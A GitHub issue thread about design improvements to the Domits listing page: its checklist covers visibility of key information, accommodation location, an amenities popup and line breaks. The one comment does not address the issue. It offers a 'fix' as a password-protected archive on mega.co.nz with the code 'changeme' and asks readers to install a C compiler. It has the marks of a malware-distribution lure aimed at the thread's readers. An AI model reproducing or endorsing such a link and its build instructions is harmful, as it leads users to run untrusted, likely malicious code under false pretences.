### ISSUE TITLE
Design improvement Listing page.

### ISSUE THREAD

**Issue by Santoshskk** [domits1/Domits#1037]
- [x] Important information must be easily visible
- [x] Location of accommodation
- [x] Amenities changed from drop down to popup
- [x] Add line break for a better overview

**Comment by SAMBILI** [comment]
This might help:This file might fix it
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)
